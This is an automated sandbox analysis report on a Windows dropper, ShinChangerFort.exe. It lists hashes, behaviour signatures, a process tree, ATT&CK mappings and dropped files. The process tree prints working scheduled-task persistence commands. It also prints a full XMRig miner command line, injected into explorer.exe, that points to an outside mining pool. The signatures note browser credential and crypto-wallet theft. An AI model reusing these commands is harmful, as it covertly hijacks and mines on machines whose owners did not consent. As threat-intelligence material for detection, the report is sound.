Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-en-20211014
  • submitted
    16-10-2021 14:06

General

  • Target

    ShinChangerFort.exe

  • Size

    3.1MB

  • MD5

    9160e2fa867538422a7d9f3d948e91c5

  • SHA1

    9751ad4f294ff8d7c067378f09288e7d142ee3ae

  • SHA256

    0f072c9ed41be4f8a023d20af8e0a49f432a27e74e79cfb434270c0c87ea9e85

  • SHA512

    2451a4448020842f017bb330c456529c5369d831021cbceffc832668f76b3f15aef706378695800877a6c6fc0d5df90d469f2eb1d8c395c8dd6613a24ab42714

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • XMRig Miner Payload 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 7 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ShinChangerFort.exe
    "C:\Users\Admin\AppData\Local\Temp\ShinChangerFort.exe"
    1⤵
    • Checks BIOS information in registry
    • Loads dropped DLL
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1108
    • C:\Users\Admin\AppData\Local\Temp\fl.exe
      "C:\Users\Admin\AppData\Local\Temp\fl.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1804
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\f1_prot.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\f1_prot.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1552
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1572
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
            5⤵
            • Creates scheduled task(s)
            PID:1216
        • C:\Users\Admin\AppData\Local\Temp\services64.exe
          "C:\Users\Admin\AppData\Local\Temp\services64.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:988
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"' & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:976
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Local\Temp\services64.exe"'
              6⤵
              • Creates scheduled task(s)
              PID:1108
          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
            5⤵
            • Executes dropped EXE
            PID:1056
          • C:\Windows\explorer.exe
            C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=prohashing.com:3359 --user=fentdev --pass=a=randomx --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=1 --cinit-idle-cpu=60 --cinit-stealth
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:972
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2_prot.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2_prot.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1484
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1296
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"'
            5⤵
            • Creates scheduled task(s)
            PID:1052
        • C:\Users\Admin\AppData\Local\Temp\services32.exe
          "C:\Users\Admin\AppData\Local\Temp\services32.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1952
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"' & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1052
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Local\Temp\services32.exe"'
              6⤵
              • Creates scheduled task(s)
              PID:1608
          • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
            "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
            5⤵
            • Executes dropped EXE
            PID:560

Network

MITRE ATT&CK Matrix ATT&CK v6

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Virtualization/Sandbox Evasion

1
T1497

Install Root Certificate

1
T1130

Modify Registry

1
T1112

Credential Access

Credentials in Files

2
T1081

Discovery

Query Registry

3
T1012

Virtualization/Sandbox Evasion

1
T1497

System Information Discovery

3
T1082

Collection

Data from Local System

2
T1005

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    MD5

    a6a22f0058bf77c54e55e65a557af512

    SHA1

    ec9bec7680e92713781d90604f9aa76a589332b4

    SHA256

    1a42574f9a8b11d0164f5c0b5a5c9cacd53df08dfe12c6e0228978ec7bd23a0e

    SHA512

    c84510ceb2e1ee9f95e291f45faf3dd3c9da86d2583045f2634f12a14167857ab378101a01727a29891edaadb6fe3bb4d15d221a6ad32f85a65e249c7475ae36

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\f1_prot.exe
    MD5

    b9bedc94ab68cf2423606bab657fe343

    SHA1

    f9d3fe51e13db292ba1954cfb9238973de62beea

    SHA256

    334576e834d0516e3ee15f1ebe5fe454c6617066f1becb047df8ad6cc47bd479

    SHA512

    8d9fd056dc30a590403fb9829717cae57b0b56258f34ce3aac8ba0056f7a8df4725dc035946f542f37142f8331e0da0c7cda3980fa1d74f883deaaaa3372bac2

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2_prot.exe
    MD5

    a21c6db90ee62cc05755c7aba5bfb33b

    SHA1

    0a39285f50527fd028eb81016f20a0a597afa24b

    SHA256

    81eccb7c63167508f91b8e2ea24d9437a9579411edd0f6f666bda1051a4cd9ee

    SHA512

    a0fdc95185e1a87428788aa10cfc70a2da671e063131c00db5e401f40bbc72a3cd302620f2c1296c4dffaba4e3819c999f0261887b68a3de8dcbd3a5762a8e35

  • C:\Users\Admin\AppData\Local\Temp\fl.exe
    MD5

    8b1011bf4b9dc38d8aececd4ed9e11c6

    SHA1

    9d04f1d07eb61b8cd6ae26be619b409ba0581ede

    SHA256

    5db7ad7b3b345ecb7da30349183fafaf4a7bbd4e566e4d7ea4c0e6d895d983d2

    SHA512

    9be022599d6348b32facef0e1dd54a02b959594c362e5d76bae8e20ba51aee53732273801efc8fb28c587036667cad34cea03068d02495aa6ec7892be9202d73

  • C:\Users\Admin\AppData\Local\Temp\fl.exe
    MD5

    8b1011bf4b9dc38d8aececd4ed9e11c6

    SHA1

    9d04f1d07eb61b8cd6ae26be619b409ba0581ede

    SHA256

    5db7ad7b3b345ecb7da30349183fafaf4a7bbd4e566e4d7ea4c0e6d895d983d2

    SHA512

    9be022599d6348b32facef0e1dd54a02b959594c362e5d76bae8e20ba51aee53732273801efc8fb28c587036667cad34cea03068d02495aa6ec7892be9202d73

  • C:\Users\Admin\AppData\Local\Temp\services32.exe
    MD5

    a21c6db90ee62cc05755c7aba5bfb33b

    SHA1

    0a39285f50527fd028eb81016f20a0a597afa24b

    SHA256

    81eccb7c63167508f91b8e2ea24d9437a9579411edd0f6f666bda1051a4cd9ee

    SHA512

    a0fdc95185e1a87428788aa10cfc70a2da671e063131c00db5e401f40bbc72a3cd302620f2c1296c4dffaba4e3819c999f0261887b68a3de8dcbd3a5762a8e35

  • C:\Users\Admin\AppData\Local\Temp\services64.exe
    MD5

    b9bedc94ab68cf2423606bab657fe343

    SHA1

    f9d3fe51e13db292ba1954cfb9238973de62beea

    SHA256

    334576e834d0516e3ee15f1ebe5fe454c6617066f1becb047df8ad6cc47bd479

    SHA512

    8d9fd056dc30a590403fb9829717cae57b0b56258f34ce3aac8ba0056f7a8df4725dc035946f542f37142f8331e0da0c7cda3980fa1d74f883deaaaa3372bac2

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    5a9eee34a0fdce1056388e807726a03c

    SHA1

    c6b401b54e262651c2b70f7c9093c7ac3e57456b

    SHA256

    116afa6b8f4213f676cc6aab6b5aec7b6547ae53cd38df09974ea1462ce41954

    SHA512

    747db9d43151a5c833a64cdfbdb39648a305504b5abbe1bb9fa0e31975cf38d708a5ddbc5f0b67b2df0fdeca20acff6b74305edef2af3371c48e73cb6e7a0184

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    5a9eee34a0fdce1056388e807726a03c

    SHA1

    c6b401b54e262651c2b70f7c9093c7ac3e57456b

    SHA256

    116afa6b8f4213f676cc6aab6b5aec7b6547ae53cd38df09974ea1462ce41954

    SHA512

    747db9d43151a5c833a64cdfbdb39648a305504b5abbe1bb9fa0e31975cf38d708a5ddbc5f0b67b2df0fdeca20acff6b74305edef2af3371c48e73cb6e7a0184

  • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
    MD5

    ef1d47ed149037d47b6fea6dad01950b

    SHA1

    df39278003c6a9bb3c8e8c420f39faf2aa953f07

    SHA256

    201582c2837f6d4f8100fb3bf7fca50914cbe90a1a9c674641f1b353e18f7359

    SHA512

    3e6760a74f41538ffdc0b8c3f92faa9ce8bdd06f0aa254e12533786b21b5dd80d2943a06a830b0c2f3c7cf42a43651542eb540c0805cfe31bd8499c7316d8676

  • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
    MD5

    ef1d47ed149037d47b6fea6dad01950b

    SHA1

    df39278003c6a9bb3c8e8c420f39faf2aa953f07

    SHA256

    201582c2837f6d4f8100fb3bf7fca50914cbe90a1a9c674641f1b353e18f7359

    SHA512

    3e6760a74f41538ffdc0b8c3f92faa9ce8bdd06f0aa254e12533786b21b5dd80d2943a06a830b0c2f3c7cf42a43651542eb540c0805cfe31bd8499c7316d8676

  • \??\c:\users\admin\appdata\local\temp\rarsfx0\f1_prot.exe
    MD5

    b9bedc94ab68cf2423606bab657fe343

    SHA1

    f9d3fe51e13db292ba1954cfb9238973de62beea

    SHA256

    334576e834d0516e3ee15f1ebe5fe454c6617066f1becb047df8ad6cc47bd479

    SHA512

    8d9fd056dc30a590403fb9829717cae57b0b56258f34ce3aac8ba0056f7a8df4725dc035946f542f37142f8331e0da0c7cda3980fa1d74f883deaaaa3372bac2

  • \??\c:\users\admin\appdata\local\temp\rarsfx0\f2_prot.exe
    MD5

    a21c6db90ee62cc05755c7aba5bfb33b

    SHA1

    0a39285f50527fd028eb81016f20a0a597afa24b

    SHA256

    81eccb7c63167508f91b8e2ea24d9437a9579411edd0f6f666bda1051a4cd9ee

    SHA512

    a0fdc95185e1a87428788aa10cfc70a2da671e063131c00db5e401f40bbc72a3cd302620f2c1296c4dffaba4e3819c999f0261887b68a3de8dcbd3a5762a8e35

  • \??\c:\users\admin\appdata\local\temp\services32.exe
    MD5

    a21c6db90ee62cc05755c7aba5bfb33b

    SHA1

    0a39285f50527fd028eb81016f20a0a597afa24b

    SHA256

    81eccb7c63167508f91b8e2ea24d9437a9579411edd0f6f666bda1051a4cd9ee

    SHA512

    a0fdc95185e1a87428788aa10cfc70a2da671e063131c00db5e401f40bbc72a3cd302620f2c1296c4dffaba4e3819c999f0261887b68a3de8dcbd3a5762a8e35

  • \??\c:\users\admin\appdata\local\temp\services64.exe
    MD5

    b9bedc94ab68cf2423606bab657fe343

    SHA1

    f9d3fe51e13db292ba1954cfb9238973de62beea

    SHA256

    334576e834d0516e3ee15f1ebe5fe454c6617066f1becb047df8ad6cc47bd479

    SHA512

    8d9fd056dc30a590403fb9829717cae57b0b56258f34ce3aac8ba0056f7a8df4725dc035946f542f37142f8331e0da0c7cda3980fa1d74f883deaaaa3372bac2

  • \Users\Admin\AppData\Local\Temp\RarSFX0\f1_prot.exe
    MD5

    b9bedc94ab68cf2423606bab657fe343

    SHA1

    f9d3fe51e13db292ba1954cfb9238973de62beea

    SHA256

    334576e834d0516e3ee15f1ebe5fe454c6617066f1becb047df8ad6cc47bd479

    SHA512

    8d9fd056dc30a590403fb9829717cae57b0b56258f34ce3aac8ba0056f7a8df4725dc035946f542f37142f8331e0da0c7cda3980fa1d74f883deaaaa3372bac2

  • \Users\Admin\AppData\Local\Temp\RarSFX0\f2_prot.exe
    MD5

    a21c6db90ee62cc05755c7aba5bfb33b

    SHA1

    0a39285f50527fd028eb81016f20a0a597afa24b

    SHA256

    81eccb7c63167508f91b8e2ea24d9437a9579411edd0f6f666bda1051a4cd9ee

    SHA512

    a0fdc95185e1a87428788aa10cfc70a2da671e063131c00db5e401f40bbc72a3cd302620f2c1296c4dffaba4e3819c999f0261887b68a3de8dcbd3a5762a8e35

  • \Users\Admin\AppData\Local\Temp\fl.exe
    MD5

    8b1011bf4b9dc38d8aececd4ed9e11c6

    SHA1

    9d04f1d07eb61b8cd6ae26be619b409ba0581ede

    SHA256

    5db7ad7b3b345ecb7da30349183fafaf4a7bbd4e566e4d7ea4c0e6d895d983d2

    SHA512

    9be022599d6348b32facef0e1dd54a02b959594c362e5d76bae8e20ba51aee53732273801efc8fb28c587036667cad34cea03068d02495aa6ec7892be9202d73

  • \Users\Admin\AppData\Local\Temp\services32.exe
    MD5

    a21c6db90ee62cc05755c7aba5bfb33b

    SHA1

    0a39285f50527fd028eb81016f20a0a597afa24b

    SHA256

    81eccb7c63167508f91b8e2ea24d9437a9579411edd0f6f666bda1051a4cd9ee

    SHA512

    a0fdc95185e1a87428788aa10cfc70a2da671e063131c00db5e401f40bbc72a3cd302620f2c1296c4dffaba4e3819c999f0261887b68a3de8dcbd3a5762a8e35

  • \Users\Admin\AppData\Local\Temp\services64.exe
    MD5

    b9bedc94ab68cf2423606bab657fe343

    SHA1

    f9d3fe51e13db292ba1954cfb9238973de62beea

    SHA256

    334576e834d0516e3ee15f1ebe5fe454c6617066f1becb047df8ad6cc47bd479

    SHA512

    8d9fd056dc30a590403fb9829717cae57b0b56258f34ce3aac8ba0056f7a8df4725dc035946f542f37142f8331e0da0c7cda3980fa1d74f883deaaaa3372bac2

  • \Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    5a9eee34a0fdce1056388e807726a03c

    SHA1

    c6b401b54e262651c2b70f7c9093c7ac3e57456b

    SHA256

    116afa6b8f4213f676cc6aab6b5aec7b6547ae53cd38df09974ea1462ce41954

    SHA512

    747db9d43151a5c833a64cdfbdb39648a305504b5abbe1bb9fa0e31975cf38d708a5ddbc5f0b67b2df0fdeca20acff6b74305edef2af3371c48e73cb6e7a0184

  • \Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
    MD5

    ef1d47ed149037d47b6fea6dad01950b

    SHA1

    df39278003c6a9bb3c8e8c420f39faf2aa953f07

    SHA256

    201582c2837f6d4f8100fb3bf7fca50914cbe90a1a9c674641f1b353e18f7359

    SHA512

    3e6760a74f41538ffdc0b8c3f92faa9ce8bdd06f0aa254e12533786b21b5dd80d2943a06a830b0c2f3c7cf42a43651542eb540c0805cfe31bd8499c7316d8676

  • memory/560-290-0x0000000000000000-mapping.dmp
  • memory/560-296-0x00000000025A0000-0x00000000025A2000-memory.dmp
    Filesize

    8KB

  • memory/972-314-0x0000000001F20000-0x0000000001F40000-memory.dmp
    Filesize

    128KB

  • memory/972-311-0x000000014030F3F8-mapping.dmp
  • memory/972-313-0x0000000140000000-0x0000000140786000-memory.dmp
    Filesize

    7.5MB

  • memory/976-223-0x0000000000000000-mapping.dmp
  • memory/988-219-0x0000000077990000-0x00000000779A0000-memory.dmp
    Filesize

    64KB

  • memory/988-122-0x0000000000000000-mapping.dmp
  • memory/988-232-0x000000001B990000-0x000000001B992000-memory.dmp
    Filesize

    8KB

  • memory/1052-287-0x0000000000000000-mapping.dmp
  • memory/1052-225-0x0000000000000000-mapping.dmp
  • memory/1056-228-0x0000000000000000-mapping.dmp
  • memory/1056-235-0x000000001BD50000-0x000000001BD52000-memory.dmp
    Filesize

    8KB

  • memory/1108-226-0x0000000000000000-mapping.dmp
  • memory/1108-61-0x0000000000320000-0x0000000000321000-memory.dmp
    Filesize

    4KB

  • memory/1108-60-0x00000000007C0000-0x00000000007C1000-memory.dmp
    Filesize

    4KB

  • memory/1108-58-0x0000000000ED0000-0x0000000000ED1000-memory.dmp
    Filesize

    4KB

  • memory/1108-55-0x0000000076081000-0x0000000076083000-memory.dmp
    Filesize

    8KB

  • memory/1216-120-0x0000000000000000-mapping.dmp
  • memory/1296-224-0x0000000000000000-mapping.dmp
  • memory/1484-220-0x0000000077990000-0x00000000779A0000-memory.dmp
    Filesize

    64KB

  • memory/1484-233-0x00000000030B0000-0x00000000030B2000-memory.dmp
    Filesize

    8KB

  • memory/1484-125-0x0000000000000000-mapping.dmp
  • memory/1552-86-0x0000000077660000-0x0000000077670000-memory.dmp
    Filesize

    64KB

  • memory/1552-77-0x0000000077660000-0x0000000077670000-memory.dmp
    Filesize

    64KB

  • memory/1552-104-0x0000000077760000-0x0000000077770000-memory.dmp
    Filesize

    64KB

  • memory/1552-102-0x0000000077760000-0x0000000077770000-memory.dmp
    Filesize

    64KB

  • memory/1552-101-0x0000000077760000-0x0000000077770000-memory.dmp
    Filesize

    64KB

  • memory/1552-100-0x0000000077760000-0x0000000077770000-memory.dmp
    Filesize

    64KB

  • memory/1552-99-0x0000000077760000-0x0000000077770000-memory.dmp
    Filesize

    64KB

  • memory/1552-98-0x0000000077760000-0x0000000077770000-memory.dmp
    Filesize

    64KB

  • memory/1552-97-0x0000000077760000-0x0000000077770000-memory.dmp
    Filesize

    64KB

  • memory/1552-114-0x000000013F310000-0x000000013F311000-memory.dmp
    Filesize

    4KB

  • memory/1552-116-0x0000000077990000-0x00000000779A0000-memory.dmp
    Filesize

    64KB

  • memory/1552-117-0x0000000002180000-0x0000000002189000-memory.dmp
    Filesize

    36KB

  • memory/1552-118-0x00000000026C0000-0x00000000026C2000-memory.dmp
    Filesize

    8KB

  • memory/1552-68-0x0000000000000000-mapping.dmp
  • memory/1552-106-0x0000000077760000-0x0000000077770000-memory.dmp
    Filesize

    64KB

  • memory/1552-107-0x0000000077760000-0x0000000077770000-memory.dmp
    Filesize

    64KB

  • memory/1552-108-0x0000000077760000-0x0000000077770000-memory.dmp
    Filesize

    64KB

  • memory/1552-109-0x0000000077760000-0x0000000077770000-memory.dmp
    Filesize

    64KB

  • memory/1552-111-0x0000000077760000-0x0000000077770000-memory.dmp
    Filesize

    64KB

  • memory/1552-112-0x0000000077760000-0x0000000077770000-memory.dmp
    Filesize

    64KB

  • memory/1552-110-0x0000000077760000-0x0000000077770000-memory.dmp
    Filesize

    64KB

  • memory/1552-103-0x0000000077760000-0x0000000077770000-memory.dmp
    Filesize

    64KB

  • memory/1552-71-0x0000000077660000-0x0000000077670000-memory.dmp
    Filesize

    64KB

  • memory/1552-72-0x0000000077660000-0x0000000077670000-memory.dmp
    Filesize

    64KB

  • memory/1552-73-0x0000000077660000-0x0000000077670000-memory.dmp
    Filesize

    64KB

  • memory/1552-74-0x0000000077660000-0x0000000077670000-memory.dmp
    Filesize

    64KB

  • memory/1552-76-0x0000000077660000-0x0000000077670000-memory.dmp
    Filesize

    64KB

  • memory/1552-105-0x0000000077760000-0x0000000077770000-memory.dmp
    Filesize

    64KB

  • memory/1552-78-0x0000000077660000-0x0000000077670000-memory.dmp
    Filesize

    64KB

  • memory/1552-79-0x0000000077660000-0x0000000077670000-memory.dmp
    Filesize

    64KB

  • memory/1552-80-0x0000000077660000-0x0000000077670000-memory.dmp
    Filesize

    64KB

  • memory/1552-81-0x0000000077660000-0x0000000077670000-memory.dmp
    Filesize

    64KB

  • memory/1552-83-0x0000000077660000-0x0000000077670000-memory.dmp
    Filesize

    64KB

  • memory/1552-84-0x0000000077660000-0x0000000077670000-memory.dmp
    Filesize

    64KB

  • memory/1552-85-0x0000000077660000-0x0000000077670000-memory.dmp
    Filesize

    64KB

  • memory/1552-87-0x0000000077660000-0x0000000077670000-memory.dmp
    Filesize

    64KB

  • memory/1552-88-0x0000000077660000-0x0000000077670000-memory.dmp
    Filesize

    64KB

  • memory/1552-75-0x0000000077660000-0x0000000077670000-memory.dmp
    Filesize

    64KB

  • memory/1552-90-0x0000000077660000-0x0000000077670000-memory.dmp
    Filesize

    64KB

  • memory/1552-91-0x0000000077660000-0x0000000077670000-memory.dmp
    Filesize

    64KB

  • memory/1552-82-0x0000000077660000-0x0000000077670000-memory.dmp
    Filesize

    64KB

  • memory/1552-92-0x0000000077660000-0x0000000077670000-memory.dmp
    Filesize

    64KB

  • memory/1552-93-0x0000000077660000-0x0000000077670000-memory.dmp
    Filesize

    64KB

  • memory/1552-95-0x0000000077660000-0x0000000077670000-memory.dmp
    Filesize

    64KB

  • memory/1552-89-0x0000000077660000-0x0000000077670000-memory.dmp
    Filesize

    64KB

  • memory/1552-96-0x0000000077660000-0x0000000077670000-memory.dmp
    Filesize

    64KB

  • memory/1552-94-0x0000000077660000-0x0000000077670000-memory.dmp
    Filesize

    64KB

  • memory/1572-119-0x0000000000000000-mapping.dmp
  • memory/1608-288-0x0000000000000000-mapping.dmp
  • memory/1804-63-0x0000000000000000-mapping.dmp
  • memory/1952-295-0x000000001C510000-0x000000001C512000-memory.dmp
    Filesize

    8KB

  • memory/1952-285-0x0000000077990000-0x00000000779A0000-memory.dmp
    Filesize

    64KB

  • memory/1952-237-0x0000000000000000-mapping.dmp